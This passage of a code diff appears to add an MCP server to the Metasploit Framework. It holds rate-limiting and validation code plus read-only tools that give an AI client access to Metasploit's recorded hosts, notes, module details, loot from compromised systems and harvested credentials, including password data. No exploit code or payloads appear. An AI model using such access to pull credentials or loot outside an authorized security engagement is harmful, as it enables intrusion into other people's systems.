  # @raise [ValidationError] If invalid
  def self.validate_offset!(offset)
    validate_parameter!('Offset', offset, 0..LIMIT_MAX, allow_nil: true)
  end

  # Validate pagination parameters
  #
  # @param limit [Integer] Limit value
  # @param offset [Integer] Offset value
  # @return [true] If valid
  # @raise [ValidationError] If invalid
  def self.validate_pagination!(limit, offset)
    validate_limit!(limit)
    validate_offset!(offset)
  end

  # Validate module type
  #
  # @param module_type [String] Module type
  # @return [true] If valid
  # @raise [ValidationError] If invalid
  def self.validate_module_type!(module_type)
    validate_parameter!('Module type', module_type, %w[exploit auxiliary post payload encoder evasion nop])
  end

  # Validate module name
  #
  # @param module_name [String] Module name/path
  # @return [true] If valid
  # @raise [ValidationError] If invalid
  def self.validate_module_name!(module_name)
    # Basic path validation (alphanumeric, slashes, underscores, hyphens)
    validate_parameter!('Module name', module_name, %r{\A[\w/\-]+\z}, max_size: 500)
  end

  # Validate only_up boolean parameter
  #
  # @param only_up [Boolean] Only up parameter
  # @return [true] If valid
  # @raise [ValidationError] If invalid
  def self.validate_only_up!(only_up)
    validate_parameter!('only_up', only_up, [true, false])
  end

  # Validate protocol parameter
  #
  # @param protocol [String] Protocol ('tcp' or 'udp'); nil/empty allowed
  # @return [true] If valid
  # @raise [ValidationError] If invalid
  def self.validate_protocol!(protocol)
    validate_parameter!('Protocol', protocol.to_s.downcase, %w[tcp udp], allow_nil: true)
  end
end
end
end
+58
View File
@@ -0,0 +1,58 @@
# frozen_string_literal: true
module Msf::MCP
module Security
class RateLimiter
  # Restored: these readers were commented out; they are side-effect-free and
  # useful for diagnostics and testing.
  attr_reader :requests_per_minute, :burst_size

  # Initialize rate limiter with token bucket algorithm
  #
  # @param requests_per_minute [Integer] Maximum sustained requests per minute
  # @param burst_size [Integer] Maximum burst size (default: same as requests_per_minute)
  def initialize(requests_per_minute: 60, burst_size: nil)
    @requests_per_minute = requests_per_minute
    @burst_size = burst_size || requests_per_minute
    @tokens = @burst_size.to_f # bucket starts full
    @last_refill = Time.now
    @mutex = Mutex.new # guards @tokens/@last_refill across threads
  end

  # Check if a request is allowed and consume one token if so.
  #
  # @param tool_name [String, nil] Tool name (reserved for logging/tracking; currently unused)
  # @return [Float] Remaining tokens after consuming one
  #   (the original doc claimed Integer; the bucket is fractional)
  # @raise [RateLimitExceededError] If rate limit exceeded; carries the number
  #   of seconds after which a retry may succeed
  def check_rate_limit!(tool_name = nil)
    @mutex.synchronize do
      refill!
      if @tokens >= 1.0
        @tokens -= 1.0
      else
        # Seconds until at least one full token has accumulated again.
        tokens_per_second = @requests_per_minute / 60.0
        retry_after = ((1.0 - @tokens) / tokens_per_second).ceil
        raise RateLimitExceededError.new(retry_after)
      end
    end
  end

  private

  # Refill tokens proportionally to wall-clock time elapsed since the last
  # refill, capped at the configured burst size.
  def refill!
    now = Time.now
    elapsed = now - @last_refill
    tokens_per_second = @requests_per_minute / 60.0
    tokens_to_add = elapsed * tokens_per_second
    @tokens = [@tokens + tokens_to_add, @burst_size.to_f].min
    @last_refill = now
  end
end
end
end
+242
View File
@@ -0,0 +1,242 @@
# frozen_string_literal: true
module Msf::MCP
##
# MCP Server Wrapper for Metasploit Framework
#
# This class initializes and manages the MCP server with all registered tools.
# It provides a clean interface for starting/stopping the server and integrates
# with the Metasploit client and security layers.
#
# The Server expects fully configured and authenticated dependencies to be
# provided during initialization. It does not handle configuration loading
# or client authentication - those are responsibilities of the calling code.
#
class Server
  ##
  # Initialize the MCP server with required dependencies
  #
  # Builds the server context handed to every tool call, wires the request
  # lifecycle callbacks (around_request, exception_reporter) into an
  # ::MCP::Configuration, and constructs the ::MCP::Server with the fixed
  # list of read-only database/tool classes below.
  #
  # @param msf_client [Metasploit::Client] Configured and authenticated Metasploit client
  # @param rate_limiter [Security::RateLimiter] Configured rate limiter
  #
  def initialize(msf_client:, rate_limiter:)
    @msf_client = msf_client
    # Create server context (passed to all tool calls)
    # Tools only need msf_client and rate_limiter
    @server_context = {
      msf_client: @msf_client,
      rate_limiter: rate_limiter
    }
    # Create MCP configuration with request lifecycle callbacks
    mcp_config = ::MCP::Configuration.new
    mcp_config.around_request = create_around_request
    mcp_config.exception_reporter = create_exception_reporter
    # Initialize MCP server with all tools
    @mcp_server = ::MCP::Server.new(
      name: 'msfmcp',
      version: Msf::MCP::Application::VERSION,
      tools: [
        Tools::SearchModules,
        Tools::ModuleInfo,
        Tools::HostInfo,
        Tools::ServiceInfo,
        Tools::VulnerabilityInfo,
        Tools::NoteInfo,
        Tools::CredentialInfo,
        Tools::LootInfo
      ],
      server_context: @server_context,
      configuration: mcp_config
    )
  end

  ##
  # Start the MCP server with specified transport
  #
  # @param transport [Symbol] Transport type (:stdio or :http)
  # @param host [String] Host address for HTTP transport (default: 'localhost')
  # @param port [Integer] Port number for HTTP transport (default: 3000)
  #
  # @return [MCP::Server] The MCP server instance (for testing purposes)
  # @raise [ArgumentError] If an unknown transport is specified
  #
  def start(transport: :stdio, host: 'localhost', port: 3000)
    case transport
    when :stdio
      start_stdio
    when :http
      start_http(host, port)
    else
      raise ArgumentError, "Unknown transport: #{transport}. Use :stdio or :http"
    end
  end

  ##
  # Shutdown the MCP server and cleanup resources
  #
  # Shuts down the Metasploit client (if any) and drops the server reference.
  # NOTE(review): this does not stop an already-running transport (stdio loop
  # or Puma); callers appear to rely on process exit for that — confirm.
  #
  def shutdown
    @msf_client&.shutdown
    @mcp_server = nil
  end

  private

  ##
  # Start stdio transport (for CLI usage)
  #
  # Blocks on the transport's read loop (StdioTransport#open).
  #
  # @return [MCP::Server] The MCP server instance (for testing purposes)
  #
  def start_stdio
    transport = ::MCP::Server::Transports::StdioTransport.new(@mcp_server)
    transport.open
    @mcp_server
  end

  ##
  # Start HTTP transport (for web/network usage)
  #
  # The transport implements the Rack app interface (#call), so it is mounted
  # directly. MCP-aware request/response logging is handled by the
  # Middleware::RequestLogger middleware.
  #
  # NOTE(review): `require 'rack/handler/puma'` may raise LoadError on setups
  # where Puma registers its handler under rackup (Rack 3 + rackup 2.x) —
  # the Rackup::Handler branch below suggests such setups are expected;
  # confirm against the pinned gem versions.
  #
  # @param host [String] Host address to bind to
  # @param port [Integer] Port to listen on
  #
  # @return [MCP::Server] The MCP server instance (for testing purposes)
  #
  def start_http(host, port)
    require 'rack'
    require 'rack/handler/puma'
    transport = ::MCP::Server::Transports::StreamableHTTPTransport.new(@mcp_server)
    # Build the Rack application with logging middleware.
    # The transport itself is a Rack app (implements #call).
    rack_app = Rack::Builder.new do
      use Msf::MCP::Middleware::RequestLogger
      run transport
    end
    # Start Puma server using the handler appropriate for the Rack version.
    # Rackup::Handler is available with rackup >= 2.x / Rack 3+;
    # Rack::Handler is used with Rack < 3 and rackup 1.x.
    puma_handler = if defined?(Rackup::Handler)
                     Rackup::Handler::Puma
                   else
                     Rack::Handler::Puma
                   end
    puma_handler.run(
      rack_app,
      Port: port,
      Host: host,
      Silent: true
    )
    @mcp_server
  end

  ##
  # Create around_request callback for MCP SDK
  #
  # This callback wraps every JSON-RPC request handler, providing access to
  # both the instrumentation data and the response result. It replaces the
  # deprecated +instrumentation_callback+ which only fires after completion
  # and does not expose the result.
  #
  # The +data+ hash is populated by the SDK with:
  # - :method — the JSON-RPC method name (e.g. "tools/call", "tools/list")
  # - :tool_name, :prompt_name, :resource_uri — specific handler identifiers
  # - :tool_arguments — arguments passed to a tool call
  # - :client — client info hash (name, version)
  # - :error — error type symbol (e.g. :tool_not_found, :internal_error)
  # - :duration — added in the ensure block after this callback returns
  #
  # NOTE(review): the body assumes +result+ is Hash-like (it indexes and
  # fetches :isError) — confirm against the SDK's handler return type.
  #
  # @return [Proc] Callback that wraps request execution and logs via Rex
  #
  def create_around_request
    ->(data, &request_handler) do
      result = request_handler.call
      # Build message based on the type of request; the checks are ordered
      # from most to least specific identifier.
      message = if data[:error]
                  "MCP Error: #{data[:error]}"
                elsif data[:tool_name]
                  "Tool call: #{data[:tool_name]}"
                elsif data[:prompt_name]
                  "Prompt call: #{data[:prompt_name]}"
                elsif data[:resource_uri]
                  "Resource call: #{data[:resource_uri]}"
                elsif data[:method]
                  "Method call: #{data[:method]}"
                else
                  "MCP request"
                end
      # Copy so the logged context can be augmented without mutating the
      # SDK-owned data hash.
      context = data.dup
      if result
        message = "#{message} (ERROR)" if result[:isError]
        context[:result] = result
      end
      # Error level for SDK-reported errors or tool-level isError responses;
      # INFO is the business-level log for everything else.
      if data[:error] || result&.fetch(:isError, nil)
        elog({ message: message, context: context }, LOG_SOURCE, LOG_ERROR)
      else
        ilog({ message: message, context: context }, LOG_SOURCE, LOG_INFO)
      end
      # The callback must return the handler's result to the SDK.
      result
    end
  end

  ##
  # Create exception reporter callback for MCP SDK
  #
  # This callback is invoked for any server exception during request processing,
  # which are not tool execution errors.
  # It receives:
  # - exception: The Ruby exception object
  # - context: Hash with :request (JSON string) or :notification (method name string)
  #
  # @return [Proc] Callback that logs exceptions via Rex
  #
  def create_exception_reporter
    ->(exception, context) do
      # Nothing useful to log when both are absent.
      return unless exception || context
      # Determine the context type and parse data
      error_context = {}
      if context&.fetch(:request, nil)
        error_context[:type] = 'request'
        request = nil
        begin
          request = JSON.parse(context[:request])
        rescue JSON::ParserError
          # Not valid JSON, log raw data
          error_context[:raw_data] = context[:request].inspect
        else
          error_context[:method] = request['method'] if request['method']
          error_context[:params] = request['params'] if request['params']
        end
      elsif context&.fetch(:notification, nil)
        error_context[:type] = 'notification'
        # context[:notification] is the notification method name (string)
        error_context[:method] = context[:notification]
      else
        error_context[:type] = 'unknown'
        error_context[:raw_data] = context.inspect
      end
      elog({
        message: "Error during #{error_context[:type]} processing#{error_context[:method] ? " (#{error_context[:method]})" : ''}",
        exception: exception,
        context: error_context
      }, LOG_SOURCE, LOG_ERROR)
    end
  end
end
end
+159
View File
@@ -0,0 +1,159 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Query Metasploit Database Credentials
#
# Retrieves credential information from the Metasploit database including
# usernames, password hashes, and authentication data.
#
class CredentialInfo < ::MCP::Tool
  tool_name 'msf_credential_info'
  description 'Query Metasploit database for discovered credentials. '\
              'Returns credential information including usernames and password data.'
  input_schema(
    properties: {
      workspace: {
        type: 'string',
        description: 'Workspace name (default: "default")',
        default: 'default'
      },
      limit: {
        type: 'integer',
        description: 'Maximum number of results',
        minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
        maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
        default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
      },
      offset: {
        type: 'integer',
        description: 'Number of results to skip',
        minimum: 0,
        default: 0
      }
    },
    required: [:workspace]
  )
  output_schema(
    properties: {
      metadata: {
        properties: {
          workspace: { type: 'string' },
          query_time: { type: 'number' },
          total_items: { type: 'integer' },
          returned_items: { type: 'integer' },
          limit: { type: 'integer' },
          offset: { type: 'integer' }
        }
      },
      data: {
        type: 'array',
        items: {
          properties: {
            host: { type: 'string' },
            port: { type: 'integer' },
            protocol: { type: 'string' },
            service_name: { type: 'string' },
            user: { type: 'string' },
            secret: { type: 'string' },
            type: { type: 'string' },
            updated_at: { type: 'string' }
          }
        }
      }
    },
    required: [:metadata, :data]
  )
  annotations(
    read_only_hint: true,
    idempotent_hint: true,
    destructive_hint: false
  )
  meta({ source: 'metasploit_database' })

  class << self
    include ToolHelper

    ##
    # Run the credential query: rate-limit, validate, fetch, paginate,
    # and wrap the result in an MCP tool response.
    #
    # @param workspace [String] Workspace name (default: 'default')
    # @param limit [Integer] Maximum results (default: 100)
    # @param offset [Integer] Results offset (default: 0)
    # @param server_context [Hash] Server context with msf_client, rate_limiter, config
    # @return [MCP::Tool::Response] Structured response with credential information
    #
    def call(workspace: 'default', limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
      started_at = Time.now
      client = server_context[:msf_client]
      # Rate-limit before doing any work, then validate the caller's paging input.
      server_context[:rate_limiter].check_rate_limit!('credential_info')
      Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)
      # `workspace` is optional in the MSF API (the default workspace is used
      # when omitted); we send it explicitly for clarity.
      raw_creds = client.db_creds(workspace: workspace)
      entries = Metasploit::ResponseTransformer.transform_creds(raw_creds)
      # Paginate locally over the full result set (instead of passing
      # limit/offset to the API) so total_items in the metadata is accurate.
      page = entries[offset, limit] || []
      payload = {
        metadata: {
          workspace: workspace,
          query_time: (Time.now - started_at).round(3),
          total_items: entries.size,
          returned_items: page.size,
          limit: limit,
          offset: offset
        },
        data: page
      }
      ::MCP::Tool::Response.new(
        [{ type: 'text', text: JSON.generate(payload) }],
        structured_content: payload
      )
    rescue Msf::MCP::Security::RateLimitExceededError => e
      tool_error_response("Rate limit exceeded: #{e.message}")
    rescue Msf::MCP::Metasploit::AuthenticationError => e
      tool_error_response("Authentication failed: #{e.message}")
    rescue Msf::MCP::Metasploit::APIError => e
      tool_error_response("Metasploit API error: #{e.message}")
    rescue Msf::MCP::Security::ValidationError => e
      tool_error_response(e.message)
    end
  end
end
end
end
+177
View File
@@ -0,0 +1,177 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Query Metasploit Database Hosts
#
# Retrieves host information from the Metasploit database including
# IP addresses, operating systems, and discovery metadata.
#
class HostInfo < ::MCP::Tool
tool_name 'msf_host_info'
description 'Query Metasploit database for discovered hosts. '\
'Returns host information including IP, OS, MAC address, and metadata.'
input_schema(
properties: {
workspace: {
type: 'string',
description: 'Workspace name (default: "default")',
default: 'default'
},
addresses: {
type: 'string',
description: 'IP address or CIDR range to filter (e.g., "192.168.1.100" or "192.168.1.0/24")'
},
only_up: {
type: 'boolean',
description: 'Filter to only return hosts that are up',
default: false
},
limit: {
type: 'integer',
description: 'Maximum number of results',
minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
},
offset: {
type: 'integer',
description: 'Number of results to skip',
minimum: 0,
default: 0
}
}
)
output_schema(
properties: {
metadata: {
properties: {
workspace: { type: 'string' },
query_time: { type: 'number' },
total_items: { type: 'integer' },
returned_items: { type: 'integer' },
limit: { type: 'integer' },
offset: { type: 'integer' }
}
},
data: {
type: 'array',
items: {
properties: {
created_at: { type: 'string' },
address: { type: 'string' },
mac_address: { type: 'string' },
hostname: { type: 'string' },
state: { type: 'string' },
os_name: { type: 'string' },
os_flavor: { type: 'string' },
os_service_pack: { type: 'string' },
os_language: { type: 'string' },
updated_at: { type: 'string' },
purpose: { type: 'string' },
info: { type: 'string' }
}
}
}
},
required: [:metadata, :data]
)
annotations(
read_only_hint: true,
idempotent_hint: true,
destructive_hint: false
)
meta({ source: 'metasploit_database' })
class << self
include ToolHelper
##
# Execute host query
#
# @param workspace [String] Workspace name (default: 'default')
# @param addresses [String, nil] IP address or CIDR range to filter
# @param only_up [Boolean] Filter to only return hosts that are up
# @param limit [Integer] Maximum results (default: 100)
# @param offset [Integer] Results offset (default: 0)
# @param server_context [Hash] Server context with msf_client, rate_limiter, config
# @return [MCP::Tool::Response] Structured response with host information
#
def call(workspace: 'default', addresses: nil, only_up: false, limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
  started_at = Time.now
  client = server_context[:msf_client]
  # Enforce the per-tool rate limit before doing any work.
  server_context[:rate_limiter].check_rate_limit!('host_info')

  # Reject malformed input before touching the Metasploit API.
  Msf::MCP::Security::InputValidator.validate_only_up!(only_up)
  Msf::MCP::Security::InputValidator.validate_ip_address!(addresses) if addresses
  Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)

  # `workspace` is optional on the MSF side (the default workspace is used
  # when absent), but we always send it explicitly for clarity.
  query = { workspace: workspace }
  query[:addresses] = addresses if addresses
  query[:only_up] = only_up if only_up

  all_hosts = Metasploit::ResponseTransformer.transform_hosts(client.db_hosts(query))

  # Pagination is applied locally rather than via the API: fetching the full
  # set is what lets us report an accurate total_items in the metadata.
  page = all_hosts[offset, limit] || []

  payload = {
    metadata: {
      workspace: workspace,
      query_time: (Time.now - started_at).round(3),
      total_items: all_hosts.size,
      returned_items: page.size,
      limit: limit,
      offset: offset
    },
    data: page
  }

  # The same payload serves both the text content and structured_content.
  ::MCP::Tool::Response.new(
    [{ type: 'text', text: JSON.generate(payload) }],
    structured_content: payload
  )
rescue Msf::MCP::Security::RateLimitExceededError => e
  tool_error_response("Rate limit exceeded: #{e.message}")
rescue Msf::MCP::Metasploit::AuthenticationError => e
  tool_error_response("Authentication failed: #{e.message}")
rescue Msf::MCP::Metasploit::APIError => e
  tool_error_response("Metasploit API error: #{e.message}")
rescue Msf::MCP::Security::ValidationError => e
  tool_error_response(e.message)
end
end
end
end
end
+161
View File
@@ -0,0 +1,161 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Query Metasploit Database Loot
#
# Retrieves loot information from the Metasploit database including
# collected files, data, and artifacts from compromised systems.
#
class LootInfo < ::MCP::Tool
  tool_name 'msf_loot_info'
  description 'Query Metasploit database for collected loot. '\
    'Returns loot information including file paths and content types.'
  # `workspace` carries a default, so it is intentionally NOT listed as
  # required: a required property that also declares a default is
  # contradictory (the default can never apply) and forced clients to send
  # it anyway. This also matches the host-info tool, where workspace is
  # optional.
  input_schema(
    properties: {
      workspace: {
        type: 'string',
        description: 'Workspace name (default: "default")',
        default: 'default'
      },
      limit: {
        type: 'integer',
        description: 'Maximum number of results',
        minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
        maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
        default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
      },
      offset: {
        type: 'integer',
        description: 'Number of results to skip',
        minimum: 0,
        default: 0
      }
    }
  )
  # Structured result: metadata envelope plus an array of loot records.
  output_schema(
    properties: {
      metadata: {
        properties: {
          workspace: { type: 'string' },
          query_time: { type: 'number' },
          total_items: { type: 'integer' },
          returned_items: { type: 'integer' },
          limit: { type: 'integer' },
          offset: { type: 'integer' }
        }
      },
      data: {
        type: 'array',
        items: {
          properties: {
            host: { type: 'string' },
            service_name_or_port: { type: 'string' },
            loot_type: { type: 'string' },
            content_type: { type: 'string' },
            name: { type: 'string' },
            info: { type: 'string' },
            data: { type: 'string' },
            created_at: { type: 'string' },
            updated_at: { type: 'string' }
          }
        }
      }
    },
    required: [:metadata, :data]
  )
  # Read-only database query: safe to repeat, modifies nothing.
  annotations(
    read_only_hint: true,
    idempotent_hint: true,
    destructive_hint: false
  )
  meta({ source: 'metasploit_database' })
  class << self
    include ToolHelper
    ##
    # Execute loot query
    #
    # @param workspace [String] Workspace name (default: 'default')
    # @param limit [Integer] Maximum results (default: 100)
    # @param offset [Integer] Results offset (default: 0)
    # @param server_context [Hash] Server context with msf_client, rate_limiter, config
    # @return [MCP::Tool::Response] Structured response with loot information
    #
    def call(workspace: 'default', limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
      start_time = Time.now
      # Extract dependencies from server context
      msf_client = server_context[:msf_client]
      rate_limiter = server_context[:rate_limiter]
      # Check rate limit
      rate_limiter.check_rate_limit!('loot_info')
      # Validate inputs
      Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)
      # Call Metasploit API
      # Note that `workspace` is optional in the MSF API, the default workspace is used if not provided.
      # The default value is sent anyway for clarity.
      options = { workspace: workspace }
      raw_loot = msf_client.db_loot(options)
      # Transform response
      transformed = Metasploit::ResponseTransformer.transform_loot(raw_loot)
      # Apply pagination
      #
      # Note that to get the total number of entries, we gather the entire data set and apply pagination here
      # instead of sending the limit and offset to the API call to be processed by MSF.
      # This is needed to provide accurate total_items count in the metadata.
      total_items = transformed.size
      paginated_data = transformed[offset, limit] || []
      # Build metadata
      metadata = {
        workspace: workspace,
        query_time: (Time.now - start_time).round(3),
        total_items: total_items,
        returned_items: paginated_data.size,
        limit: limit,
        offset: offset
      }
      # Return MCP response
      ::MCP::Tool::Response.new(
        [
          {
            type: 'text',
            text: JSON.generate(
              metadata: metadata,
              data: paginated_data
            )
          }
        ],
        structured_content: {
          metadata: metadata,
          data: paginated_data
        }
      )
    rescue Msf::MCP::Security::RateLimitExceededError => e
      tool_error_response("Rate limit exceeded: #{e.message}")
    rescue Msf::MCP::Metasploit::AuthenticationError => e
      tool_error_response("Authentication failed: #{e.message}")
    rescue Msf::MCP::Metasploit::APIError => e
      tool_error_response("Metasploit API error: #{e.message}")
    rescue Msf::MCP::Security::ValidationError => e
      tool_error_response(e.message)
    end
  end
end
end
end
+147
View File
@@ -0,0 +1,147 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Get Metasploit Module Information
#
# Retrieves detailed information about a specific Metasploit module including
# options, targets, references, and compatibility details.
#
class ModuleInfo < ::MCP::Tool
  tool_name 'msf_module_info'
  description 'Retrieves detailed information, documentation, and options for a single specific Metasploit module. '\
  'Returns comprehensive module details including options, targets, payloads, and references.'
  # Both arguments are mandatory: the module type constrains the lookup and
  # the name is the framework path of the module (without the type prefix).
  input_schema(
    properties: {
      type: {
        type: 'string',
        description: 'Module type (exploit, auxiliary, post, payload, etc.)',
        enum: ['exploit', 'auxiliary', 'post', 'payload', 'encoder', 'evasion', 'nop']
      },
      name: {
        type: 'string',
        description: 'Module path/name (e.g., windows/smb/ms17_010_eternalblue)',
        minLength: 1,
        maxLength: 500
      }
    },
    required: [:type, :name]
  )
  # Single-object result (no pagination): metadata carries only query timing,
  # data mirrors the fields emitted by ResponseTransformer.transform_module_info.
  output_schema(
    properties: {
      metadata: {
        properties: {
          query_time: { type: 'number' }
        }
      },
      data: {
        properties: {
          # TODO: consider adding `description` fields to these properties
          type: { type: 'string' },
          name: { type: 'string' },
          fullname: { type: 'string' },
          rank: { type: 'string' },
          disclosure_date: { type: 'string' },
          description: { type: 'string' },
          license: { type: 'string' },
          filepath: { type: 'string' },
          architectures: { type: 'array', items: { type: 'string', enum: %w[
            x86 x86_64 x64 mips mipsle mipsbe mips64 mips64le ppc ppce500v2
            ppc64 ppc64le cbea cbea64 sparc sparc64 armle armbe aarch64 cmd
            php tty java ruby dalvik python nodejs firefox zarch r
            riscv32be riscv32le riscv64be riscv64le loongarch64
          ] } },
          platforms: { type: 'array', items: { type: 'string' } },
          authors: { type: 'array', items: { type: 'string' } },
          privileged: { type: 'boolean' },
          has_check_method: { type: 'boolean' },
          default_options: { type: 'object' },
          references: { type: 'array', items: { type: ['string', 'object'] } },
          targets: { type: 'object' },
          default_target: { type: 'integer' },
          stance: { type: 'string' },
          actions: { type: 'object' },
          # NOTE(review): default_action is declared integer here (an index,
          # like default_target) — confirm the transformer emits an index and
          # not the action name string.
          default_action: { type: 'integer' },
          options: { type: 'object' }
        }
      }
    },
    required: [:metadata, :data]
  )
  # Read-only framework lookup: safe to repeat, modifies nothing.
  annotations(
    read_only_hint: true,
    idempotent_hint: true,
    destructive_hint: false
  )
  meta({ source: 'metasploit_framework' })
  class << self
    include ToolHelper
    ##
    # Execute module info retrieval
    #
    # @param type [String] Type of module
    # @param name [String] Name/path of module
    # @param server_context [Hash] Server context with msf_client, rate_limiter, config
    # @return [MCP::Tool::Response] Structured response with module details
    #
    def call(type:, name:, server_context:)
      start_time = Time.now
      # Extract dependencies from server context
      msf_client = server_context[:msf_client]
      rate_limiter = server_context[:rate_limiter]
      # Check rate limit
      rate_limiter.check_rate_limit!('module_info')
      # Validate inputs before they reach the RPC layer
      Msf::MCP::Security::InputValidator.validate_module_type!(type)
      Msf::MCP::Security::InputValidator.validate_module_name!(name)
      # Call Metasploit API
      raw_module_info = msf_client.module_info(type, name)
      # Transform response into the documented output schema shape
      transformed = Metasploit::ResponseTransformer.transform_module_info(raw_module_info)
      # Build metadata (timing only; this endpoint returns a single record)
      metadata = {
        query_time: (Time.now - start_time).round(3)
      }
      # Return MCP response: same payload as text JSON and structured content
      ::MCP::Tool::Response.new(
        [
          {
            type: 'text',
            text: JSON.generate(
              metadata: metadata,
              data: transformed
            )
          }
        ],
        structured_content: {
          metadata: metadata,
          data: transformed
        }
      )
    rescue Msf::MCP::Security::RateLimitExceededError => e
      tool_error_response("Rate limit exceeded: #{e.message}")
    rescue Msf::MCP::Metasploit::AuthenticationError => e
      tool_error_response("Authentication failed: #{e.message}")
    rescue Msf::MCP::Metasploit::APIError => e
      tool_error_response("Metasploit API error: #{e.message}")
    rescue Msf::MCP::Security::ValidationError => e
      tool_error_response(e.message)
    end
  end
end
end
end
+185
View File
@@ -0,0 +1,185 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Query Metasploit Database Notes
#
# Retrieves notes from the Metasploit database including user annotations,
# scan results, and discovery metadata.
#
class NoteInfo < ::MCP::Tool
  tool_name 'msf_note_info'
  description 'Query Metasploit database for notes and annotations. '\
    'Returns notes including host associations and metadata.'
  # `workspace` carries a default, so it is intentionally NOT listed as
  # required: a required property that also declares a default is
  # contradictory (the default can never apply) and forced clients to send
  # it anyway. This also matches the host-info tool, where workspace is
  # optional.
  input_schema(
    properties: {
      workspace: {
        type: 'string',
        description: 'Workspace name (default: "default")',
        default: 'default'
      },
      type: {
        type: 'string',
        description: 'Note type (e.g. "ssl.certificate", "smb.fingerprint")'
      },
      host: {
        type: 'string',
        description: 'Host IP address to filter (e.g., "192.168.1.100")'
      },
      ports: {
        type: 'string',
        description: 'Port number or range to filter (e.g., "80" or "80-443")'
      },
      protocol: {
        type: 'string',
        description: 'Protocol to filter (tcp or udp)',
        enum: ['tcp', 'udp']
      },
      limit: {
        type: 'integer',
        description: 'Maximum number of results',
        minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
        maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
        default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
      },
      offset: {
        type: 'integer',
        description: 'Number of results to skip',
        minimum: 0,
        default: 0
      }
    }
  )
  # Structured result: metadata envelope plus an array of note records.
  output_schema(
    properties: {
      metadata: {
        properties: {
          workspace: { type: 'string' },
          query_time: { type: 'number' },
          total_items: { type: 'integer' },
          returned_items: { type: 'integer' },
          limit: { type: 'integer' },
          offset: { type: 'integer' }
        }
      },
      data: {
        type: 'array',
        items: {
          properties: {
            host: { type: 'string' },
            service_name_or_port: { type: 'string' },
            note_type: { type: 'string' },
            data: { type: 'string' },
            created_at: { type: 'string' }
          }
        }
      }
    },
    required: [:metadata, :data]
  )
  # Read-only database query: safe to repeat, modifies nothing.
  annotations(
    read_only_hint: true,
    idempotent_hint: true,
    destructive_hint: false
  )
  meta({ source: 'metasploit_database' })
  class << self
    include ToolHelper
    ##
    # Execute note query
    #
    # @param workspace [String] Workspace name (default: 'default')
    # @param host [String, nil] Host IP address to filter
    # @param type [String, nil] Note type to filter
    # @param ports [String, nil] Port or port range to filter
    # @param protocol [String, nil] Protocol to filter (tcp or udp)
    # @param limit [Integer] Maximum results (default: 100)
    # @param offset [Integer] Results offset (default: 0)
    # @param server_context [Hash] Server context with msf_client, rate_limiter, config
    # @return [MCP::Tool::Response] Structured response with note information
    #
    def call(workspace: 'default', host: nil, type: nil, ports: nil, protocol: nil, limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
      start_time = Time.now
      # Extract dependencies from server context
      msf_client = server_context[:msf_client]
      rate_limiter = server_context[:rate_limiter]
      # Check rate limit
      rate_limiter.check_rate_limit!('note_info')
      # Validate inputs (note: `type` is free-form and passed through as-is)
      Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)
      Msf::MCP::Security::InputValidator.validate_protocol!(protocol) if protocol
      Msf::MCP::Security::InputValidator.validate_ip_address!(host) if host
      Msf::MCP::Security::InputValidator.validate_port_range!(ports) if ports
      # Call Metasploit API
      # Note that `workspace` is optional in the MSF API, the default workspace is used if not provided.
      # The default value is sent anyway for clarity.
      options = { workspace: workspace }
      options[:address] = host if host
      options[:ntype] = type if type
      options[:ports] = ports if ports
      options[:proto] = protocol if protocol
      raw_notes = msf_client.db_notes(options)
      # Transform response
      transformed = Metasploit::ResponseTransformer.transform_notes(raw_notes)
      # Apply pagination
      #
      # Note that to get the total number of entries, we gather the entire data set and apply pagination here
      # instead of sending the limit and offset to the API call to be processed by MSF.
      # This is needed to provide accurate total_items count in the metadata.
      total_items = transformed.size
      paginated_data = transformed[offset, limit] || []
      # Build metadata
      metadata = {
        workspace: workspace,
        query_time: (Time.now - start_time).round(3),
        total_items: total_items,
        returned_items: paginated_data.size,
        limit: limit,
        offset: offset
      }
      # Return MCP response
      ::MCP::Tool::Response.new(
        [
          {
            type: 'text',
            text: JSON.generate(
              metadata: metadata,
              data: paginated_data
            )
          }
        ],
        structured_content: {
          metadata: metadata,
          data: paginated_data
        }
      )
    rescue Msf::MCP::Security::RateLimitExceededError => e
      tool_error_response("Rate limit exceeded: #{e.message}")
    rescue Msf::MCP::Metasploit::AuthenticationError => e
      tool_error_response("Authentication failed: #{e.message}")
    rescue Msf::MCP::Metasploit::APIError => e
      tool_error_response("Metasploit API error: #{e.message}")
    rescue Msf::MCP::Security::ValidationError => e
      tool_error_response(e.message)
    end
  end
end
end
end
+158
View File
@@ -0,0 +1,158 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Search Metasploit Modules
#
# Searches the Metasploit Framework module database using various criteria.
# Supports keyword search, filtering by type, platform, and pagination.
#
class SearchModules < ::MCP::Tool
  tool_name 'msf_search_modules'
  description 'Search Metasploit modules according to generic search terms or specific criteria. '\
    'Returns a list of modules matching the search criteria.'
  input_schema(
    properties: {
      # TODO: improve search criteria by adding the supported key/value pair.
      # The API support things like `type:exploit platform:windows cve:CVE-2021-34527`
